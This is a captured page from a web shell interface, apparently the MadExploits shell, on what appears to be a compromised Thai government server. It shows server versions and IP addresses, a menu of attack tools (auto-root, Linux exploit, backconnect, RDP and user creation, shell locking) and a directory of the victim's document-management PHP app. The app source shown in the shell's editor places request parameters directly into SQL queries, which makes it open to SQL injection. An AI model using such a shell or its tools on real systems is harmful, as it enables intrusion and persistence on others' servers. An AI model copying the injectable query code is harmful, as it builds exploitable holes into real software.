Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
book /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
book_delay.php
14.43
KB
-rw-r--r--
bookdetail.php
13.23
KB
-rwxr-xr-x
bookdetail_group.php
20.9
KB
-rwxr-xr-x
bookdetail_khet_person.php
16.14
KB
-rwxr-xr-x
bookdetail_khet_total.php
11.85
KB
-rwxr-xr-x
bookdetail_khet_total_2.php
11.87
KB
-rw-r--r--
bookdetail_saraban.php
18.39
KB
-rwxr-xr-x
bookdetail_school_person.php
13.71
KB
-rwxr-xr-x
bookdetail_school_saraban.php
20.33
KB
-rwxr-xr-x
bookdetail_school_total.php
10.3
KB
-rwxr-xr-x
bookdetail_school_total_2.php
10.69
KB
-rw-r--r--
booksenddetail.php
9.98
KB
-rwxr-xr-x
booksenddetail_2.php
10.38
KB
-rw-r--r--
group.php
5.46
KB
-rwxr-xr-x
group_member.php
4.19
KB
-rwxr-xr-x
group_member_report.php
2.68
KB
-rwxr-xr-x
livesearch.php
742
B
-rwxr-xr-x
livesearch_2.php
744
B
-rwxr-xr-x
livesearch_3.php
681
B
-rwxr-xr-x
move_book.php
6.11
KB
-rw-r--r--
person_chk.php
859
B
-rwxr-xr-x
receive.php
27.38
KB
-rw-r--r--
receive.php-OLD
26.39
KB
-rwxr-xr-x
receive.php==1
25.38
KB
-rwxr-xr-x
receive00.php
25.8
KB
-rwxr-xr-x
receive11.php
26.13
KB
-rwxr-xr-x
receive_mobile.php
23.72
KB
-rwxr-xr-x
report_1.php
13.08
KB
-rw-r--r--
report_2.php
13.21
KB
-rw-r--r--
select_send.php
9.07
KB
-rwxr-xr-x
select_send_2.php
8.78
KB
-rwxr-xr-x
send.php
41.59
KB
-rw-r--r--
send.php--1
35.79
KB
-rwxr-xr-x
send.php-OLD
40.13
KB
-rwxr-xr-x
send.php.save
38.56
KB
-rwxr-xr-x
send.php_bkkk
38.48
KB
-rwxr-xr-x
send_2.php
15.54
KB
-rwxr-xr-x
send_mobile.php
33.85
KB
-rwxr-xr-x
send_sch_2.php
11.96
KB
-rwxr-xr-x
sendto_show.php
2.31
KB
-rwxr-xr-x
z.php
248
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bookdetail_school_saraban.php
<?php session_start(); if(!(isset($_SESSION['login_user_id']))){ exit(); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php if(isset($_SESSION['user_os'])){ if($_SESSION['user_os']=='mobile'){ echo "<meta name = 'viewport' content = 'width = device-width'>"; } } ?> <style type="text/css"> <!-- .style1 { font-size: 12px; } --> </style> <script> function registerDel(register_num,year,school_code) { if (register_num == "") { document.getElementById("txtHint").innerHTML = ""; return; } else { if (window.XMLHttpRequest) { xmlhttp = new XMLHttpRequest(); } else { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("txtHint").innerHTML = this.responseText; document.getElementById("register_del").style.display="none"; } }; xmlhttp.open("GET","livesearch_3.php?register_num="+register_num+"&year="+year+"&school_code="+school_code,true); xmlhttp.send(); } } </script> </head> <body> <?php date_default_timezone_set('Asia/Bangkok'); require_once "../../../amssplus_connect.php"; require_once("../../../mainfile.php"); require_once("../time_inc.php"); $user=$_SESSION['login_user_id']; if(!(isset($_POST['index']))){ $_POST['index']=""; } if(!(isset($_GET['index']))){ $_GET['index']=""; } if($_POST['index']==1){ if (isset($_POST['s_id'])) { $day_now=date("Y-m-d H:i:s"); mysqli_query($connect,"INSERT INTO book_sendto_answer (send_to, school, ref_id, status, forward_from, rec_forward_date) Values('$_POST[s_id]', '$_SESSION[user_school]', '$_POST[ref_id]', '5', '$_POST[forward_name]','$day_now') ") ; // ส่วนบันทึกผู้ปฏิบัติในทะเบียนรับหนังสือราชการ $sql_operation = mysqli_query($connect,"SELECT * FROM person_sch_main WHERE person_id='$_POST[s_id]'"); $row_operation= mysqli_fetch_array($sql_operation) ; $operation_name=$row_operation['prename'].$row_operation['name']." ".$row_operation['surname']; mysqli_query($connect,"update bookregister_receive_sch set operation='$operation_name' where ref_id='$_POST[ref_id]' and school_code='$_SESSION[user_school]'") ; } } if($_GET['index']==2){ mysqli_query($connect,"DELETE FROM book_sendto_answer WHERE id='$_GET[sd_index]' ") ; } $sql_permission = "select * from book_permission where person_id='$_SESSION[login_user_id]' and p3='$_SESSION[user_school]' "; $dbquery_permission = mysqli_query($connect,$sql_permission); $result_permission = mysqli_fetch_array($dbquery_permission); $sql = mysqli_query($connect,"SELECT * FROM book_main WHERE ms_id ='$_REQUEST[b_id]' ") ; $row2= mysqli_fetch_array($sql) ; $id = $row2['ms_id']; $ref_id = $row2['ref_id']; $level = $row2['level']; $bookno = $row2['bookno']; $signdate = $row2['signdate']; $subject = $row2['subject']; $ref_id = $row2['ref_id']; $rec_date = $row2['send_date']; $detail = $row2['detail']; $detail = nl2br($detail) ; $send_date=thai_date_4($rec_date); $signdate=thai_date_3($signdate); //หาหน่วยงานผู้ส่ง $sql_sender = mysqli_query($connect,"SELECT * FROM system_workgroup WHERE workgroup='$row2[office]' ") ; $row_sender= mysqli_fetch_array($sql_sender) ; if($row_sender){ $sender=$row_sender['workgroup_desc']; //หาชื่อผู้ส่ง $sql_name = mysqli_query($connect,"SELECT * FROM person_main WHERE person_id='$row2[sender]'"); $row_name= mysqli_fetch_array($sql_name) ; } else { $sql_sender = mysqli_query($connect,"SELECT * FROM system_school WHERE school_code='$row2[office]' ") ; $row_sender= mysqli_fetch_array($sql_sender) ; $sender=$row_sender['school_name']; //หาชื่อผู้ส่ง $sql_name = mysqli_query($connect,"SELECT * FROM person_sch_main WHERE person_id='$row2[sender]'"); $row_name= mysqli_fetch_array($sql_name) ; } // saraban answer $sql_answer = mysqli_query($connect,"SELECT id FROM book_sendto_answer WHERE ref_id ='$ref_id' and send_to='$_SESSION[user_school]' and answer is null") ; $ans_num = mysqli_num_rows ($sql_answer) ; if ($ans_num>0) { $day_now=date("Y-m-d H:i:s"); $sql_answer = mysqli_query($connect,"update book_sendto_answer set answer='1', answer_time='$day_now' where ref_id='$ref_id' and send_to='$_SESSION[user_school]'") ; //ส่วนการบันทึกทะเบียนรับส่งหนังสือราชการ $sql_check_bookregister = mysqli_query($connect,"SELECT * FROM bookregister_year WHERE school_code='$_SESSION[user_school]' and year_active='1' and start_receive_num!='0' ") ; if($result_start=mysqli_fetch_array($sql_check_bookregister)){ //เลขทะเบียน $sql_number="select max(register_number) as number_max from bookregister_receive_sch where year='$result_start[year]' and school_code='$_SESSION[user_school]' "; $query_number=mysqli_query($connect,$sql_number); $result_number=mysqli_fetch_array($query_number); if($result_number['number_max']<$result_start['start_receive_num']){ $register_number=$result_start['start_receive_num']; } else{ $register_number=$result_number['number_max']+1; } if($row2['secret']==1){ $secret=1; } else{ $secret=0; } if($row2['bookregis_link']==1){ $bookregis_link=1; } else { $bookregis_link=0; } $sql = "insert into bookregister_receive_sch(school_code, year, register_number, book_no, signdate, book_from, book_to, subject, register_date, ref_id, officer, book_link, secret) values ('$_SESSION[user_school]', '$result_start[year]', '$register_number', '$bookno', '$row2[signdate]', '$sender', '$_SESSION[system_school_name]', '$subject', '$day_now', '$ref_id', '$user', '$bookregis_link', '$secret')"; $dbquery = mysqli_query($connect,$sql); } //end บันทึกทะเบียนรับ } //select เลขทะเบียนหนังสือรับ $query_register_num=mysqli_query($connect,"select register_number from bookregister_receive_sch where ref_id='$ref_id' "); $result_register_num= mysqli_fetch_array($query_register_num) ; // img of level if ($level==1) { $img_level = "<IMG SRC=\"../images/level1.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ปกติ\"> <FONT SIZE=\"2\" COLOR=>ปกติ</FONT>" ; }else if ($level==2) { $img_level = "<IMG SRC=\"../images/level2.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ด่วน\"> <FONT SIZE=\"2\" COLOR=>ด่วน</FONT>" ; }else if ($level==3) { $img_level = "<IMG SRC=\"../images/level3.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ด่วนมาก\"> <FONT SIZE=\"2\" COLOR=>ด่วนมาก</FONT>" ; }else if ($level==4) { $img_level = "<IMG SRC=\"../images/level4.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ด่วนที่สุด\"> <FONT SIZE=\"2\" COLOR=>ด่วนที่สุด</FONT>" ; } ?> <div align="center"> <table border="0" width="480" id="table1" style="border-collapse: collapse; border: 1px dotted #FF00FF; ; padding-left:4px; padding-right:4px; padding-top:1px; padding-bottom:1px" cellpadding="2" > <tr> <td bgcolor="#003399" colspan="2" style="border: 1px dotted #808000"><font color="#FFFFFF"> <span lang="en-us"><font size="2"> </font></span><font size="2">รายละเอียดหนังสือ <?php echo $bookno;?></font></font></td> </tr> <tr> <td width="449" align="right" colspan="2" style="border: 1px dotted #808000"> <p align="left"><font size="2"> เรื่อง : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $subject;?></FONT> [<?php echo $img_level;?>] </td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> เลขทะเบียนหนังสือรับ : </font> <FONT SIZE="2" COLOR="#CC3300"><span id="txtHint"><?php echo $result_register_num['register_number']; ?></span></font> <?php //ส่วนให้สามารถลบเลขหนังสือรับจากทะเบียนหนังสือราชการได้ //เช็คทะเบียนหนังสือรับ $sql_check_bookregister_2 = mysqli_query($connect,"SELECT * FROM bookregister_year WHERE school_code='$_SESSION[user_school]' and year_active='1' and start_receive_num!='0' ") ; if($result_start_2=mysqli_fetch_array($sql_check_bookregister_2)){ //เลขทะเบียน $sql_number_2="select max(register_number) as number_max from bookregister_receive_sch where year='$result_start_2[year]' and school_code='$_SESSION[user_school]' "; $query_number_2=mysqli_query($connect,$sql_number_2); $result_number_2=mysqli_fetch_array($query_number_2); if($result_register_num['register_number']==$result_number_2['number_max']){ echo " <font size='2'><span id='register_del'><a href='#' onclick='registerDel($result_register_num[register_number],$result_start_2[year],$_SESSION[user_school])'>[ลบการลงทะเบียนหนังสือรับ]</a></span></font>"; } } ?> </td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> หนังสือลงวันที่ : </font> <FONT SIZE="2" COLOR="#CC3300"><?php echo $signdate;?></font></td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> ส่งโดย : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $sender;?> [<?php echo $row_name['name'];?> <?php echo $row_name['surname'];?>]</font></td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> วันเวลาที่ส่ง : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $send_date;?></font> </td> </tr> <tr> <td width="85" align="left" style="border: 1px dotted #808000"><font size="2"> เนื้อหาโดยสรุป</font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table2" style="border-collapse: collapse" bordercolor="#808000" cellspacing="2" cellpadding="2"> <tr> <td align="left"><FONT SIZE="2" align="left"><?php echo $detail;?></FONT></td> </tr> </table> </div> </td> </tr> <tr> <td align="left" style="border: 1px dotted #808000"><font size="2"> ไฟล์แนบ </font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table3" style="border-collapse: collapse" bordercolor=#669999 cellspacing="2" cellpadding="2"> <?php // check file attach if($row2['bookregis_link']==0){ $sql_file = mysqli_query($connect,"SELECT * FROM book_filebook WHERE ref_id = '$ref_id' ") ; $road="../upload_files/"; } else if($row2['bookregis_link']==1 and $row2['book_type']==1){ $sql_file = mysqli_query($connect,"SELECT * FROM bookregister_send_filebook WHERE ref_id='$ref_id' ") ; $road="../../bookregister/upload_files2/"; } else if($row2['bookregis_link']==1 and $row2['book_type']==2){ $sql_file = mysqli_query($connect,"SELECT * FROM bookregister_send_filebook_sch WHERE ref_id='$ref_id' ") ; $road="../../bookregister/upload_files2/"; } $file_num = mysqli_num_rows ($sql_file) ; if ($file_num<> 0) { $list = 1 ; while ($list<= $file_num&&$row= mysqli_fetch_array($sql_file)) { $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; //xx if($row2['secret']==1){ ?> <tr> <td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><FONT SIZE="2"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></td> </tr> <?php } else{ ?> <tr> <td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><A HREF="<?php echo $road.$file_name;?>" title="คลิกเพื่อเปิดไฟล์แนบลำดับที่ <?php echo $list;?>" target="_BLANK"><FONT SIZE="2"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></A></td> </tr> <?php } //endxx $list ++ ; } }else { ?> <tr> <td> <FONT SIZE="2" COLOR="#CC3300"> ไม่มีไฟล์แนบ</FONT></td> </tr> <?php } ?> </table> </div> </td> </tr> <tr> <td align="center" colspan="2"><BR><b> <font size="2" color="#6600CC">ส่งถึง</font></b></td> </tr> <tr> <td colspan="2"> <table border="1" width="98%" id="table3" style="border-collapse: collapse" bordercolor=#669999 cellpadding="2"> <?php // อาเรย์ชื่อหน่วยงาาน $office_name_ar['saraban']="สารบรรณกลาง"; $sql_work_group = mysqli_query($connect,"SELECT * FROM system_workgroup") ; while ($row_work_group= mysqli_fetch_array($sql_work_group)){ $office_name_ar[$row_work_group['workgroup']]=$row_work_group['workgroup_desc']; } $sql_sch = mysqli_query($connect,"SELECT * FROM system_school") ; while ($row_sch= mysqli_fetch_array($sql_sch)){ $office_name_ar[$row_sch['school_code']]=$row_sch['school_name']; } $sql_person = mysqli_query($connect,"SELECT * FROM person_sch_main") ; while ($row_person = mysqli_fetch_array($sql_person)){ $office_name_ar[$row_person['person_id']]=$row_person['prename'].$row_person['name']." ".$row_person['surname']; } $sql_name = "select * from book_sendto_answer where ref_id='$ref_id' and (send_to='$_SESSION[user_school]' or school='$_SESSION[user_school]') order by id "; $dbquery_name = mysqli_query($connect,$sql_name); $M=1; while ($result_name=mysqli_fetch_array($dbquery_name)) { $send_to= $result_name['send_to']; $answer=$result_name['answer']; $answer_time=$result_name['answer_time']; $answer_time=thai_date_4($answer_time); echo "<tr><td width='40%' align='left'> <FONT SIZE='2'>$M.</FONT><FONT SIZE='2'>$office_name_ar[$send_to]</FONT></td><td align='left'>"; if ($answer==0) { $ans_img = "<IMG SRC=\"../images/b_usrdrop.png\" WIDTH=\"16\" HEIGHT=\"16\" BORDER=\"0\" ALT=\"ยังไม่ลงทะเบียนรับ \"><FONT SIZE=\"2\" COLOR=\"\">ยังไม่ลงทะเบียนรับ</FONT>" ; } else if($answer==1) { $ans_img = "<IMG SRC=\"../images/b_usrcheck.png\" WIDTH=\"16\" HEIGHT=\"16\" BORDER=\"0\" ALT=\"ลงทะเบียนรับแล้ว\"><FONT SIZE=\"2\" COLOR=\"\">ลงทะเบียนรับแล้วเมื่อ $answer_time</FONT>" ; } echo $ans_img; echo "</td></tr>"; $M++; } $date=date("Y-m-d H:i:s"); $date_now=thai_date_4($date); ?> </table> </td> </tr> <tr><td colspan="2"> <BR> <CENTER><FONT SIZE="2" COLOR="#0000FF">ข้อมูล ณ <?php echo $date_now;?></FONT><BR><FONT SIZE="2" COLOR="#999933">************************************</FONT></CENTER> </td></tr> <!--ส่วนของการส่งหนังสือให้กลุ่ม--> <br /> <tr><td colspan="2"> <br /> <table border="0" width="100%" style="border-collapse: collapse"> <tr> <td bgcolor="#003399"><font face="Tahoma"><font size="2"> </font><span lang="th"><font size="2" color="#FFFFFF"><B>กรุณากำหนดผู้รับหนังสือไปดำเนินการ</B></font></span></font> </td> </tr> </table> <form method="POST" action="bookdetail_school_saraban.php" name="form1" onSubmit="return checkform(<?php echo $_REQUEST['b_id'];?>);"> <TABLE border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width=95%> <?php if($result_permission){ echo "<tr>"; $result1=mysqli_query($connect,"SELECT * FROM person_sch_main where school_code='$_SESSION[user_school]' and status='0' order by name") ; $num1 = mysqli_num_rows ($result1) ; $list1=1; while ($r1=mysqli_fetch_array($result1)) { $person_id = $r1['person_id'] ; $prename = $r1['prename'] ; $name = $r1['name'] ; $surname = $r1['surname'] ; ?> <TD width="25%" align="left"> <input type="radio" name="s_id" value="<?php echo $person_id;?>"><FONT SIZE="2"><?php echo $prename.$name." ".$surname;?></FONT></TD> <?php if($list1%2==0){echo "</tr><tr>";} $list1 ++ ; } //บุคลากรในตารางขยาย echo "<tr>"; $result1=mysqli_query($connect, "select * from person_sch_other left join person_sch_main on person_sch_other.person_id=person_sch_main.person_id where person_sch_main.status='0' and person_sch_other.status='0' and person_sch_other.school_code='$_SESSION[user_school]' ") ; $num1 = mysqli_num_rows ($result1) ; $list1=1; while ($r1=mysqli_fetch_array($result1)) { $person_id = $r1['person_id'] ; $prename = $r1['prename'] ; $name = $r1['name'] ; $surname = $r1['surname'] ; ?> <TD width="25%" align="left"> <input type="radio" name="s_id" value="<?php echo $person_id;?>"><FONT SIZE="2"><?php echo $prename.$name." ".$surname;?></FONT></TD> <?php if($list1%2==0){echo "</tr><tr>";} $list1 ++ ; } ?> </TR> </table> <BR><input name="ref_id" type="hidden" value="<?php echo $ref_id;?>"><input name="forward_name" type="hidden" value="<?php echo $user;?>"><input name="index" type="hidden" value="1"><input name="b_id" type="hidden" value="<?php echo $_REQUEST['b_id'];?>"><div align="center"><input type="submit" value=" เลือก " name="submit"></div> <HR> </form> <!--แสดงผู้ที่เคยส่งหนังสือให้ --> <?php $result2=mysqli_query($connect,"SELECT book_sendto_answer.id, book_sendto_answer.rec_forward_date, person_sch_main.prename, person_sch_main.name, person_sch_main.surname FROM book_sendto_answer, person_sch_main where book_sendto_answer.send_to=person_sch_main.person_id and book_sendto_answer.ref_id='$ref_id' and school='$_SESSION[user_school]' and book_sendto_answer.status='5' ") ; $num2 = mysqli_num_rows ($result2) ; ?> <table border="0" width="400" style="border-collapse: collapse"> <form method="POST" action="" name="form2" > <tr> <td> <b><font size="2" color="#003399">รายชื่อบุคคลที่ส่งหนังสือให้แล้ว จำนวน <FONT SIZE="2" COLOR="#FF0066"><?php echo $num2;?></FONT> ราย</font></b></td> </tr> <tr> <td align="left"> <?php $list2=1; while ($r2=mysqli_fetch_array($result2)) { ?> <FONT SIZE="2" COLOR=""><A HREF="bookdetail_school_saraban.php?index=2&sd_index=<?php echo $r2['id'];?>&b_id=<?php echo $_REQUEST['b_id'];?> "><IMG SRC="../../../images/b_drop.png" WIDTH="16" HEIGHT="16" BORDER="0" ALT="ลบออก"></A> <?php echo $list2;?>. <?php echo $r2['prename'].$r2['name']." ".$r2['surname'] ;?> <?php $send_date=thai_date_4($r2['rec_forward_date']); echo $send_date; ?></FONT><BR> <?php $list2 ++ ; } ?> </td> </tr> </form> </table> <?php } ?> </td></tr> <tr><td colspan="2"> <br /> <CENTER><input border="0" src="../images/button95.jpg" name="I1" width="100" height="20" type="image" onClick="javascript:window.close()"></CENTER> </td></tr> </table> </div> <script language="JavaScript"> function checkform(b_id) { var checkvar = document.all; var check = ""; for (i = 0; i < checkvar.length; i++) { if (checkvar[i].checked){ check = "Y"; break; } } if (check==""){ alert("กรุณาเลือกรายการค่ะ"); return false; }else{ window.opener.document.getElementById("forward"+b_id).style.display="none"; return true; } } </script> </body> </html>
Close
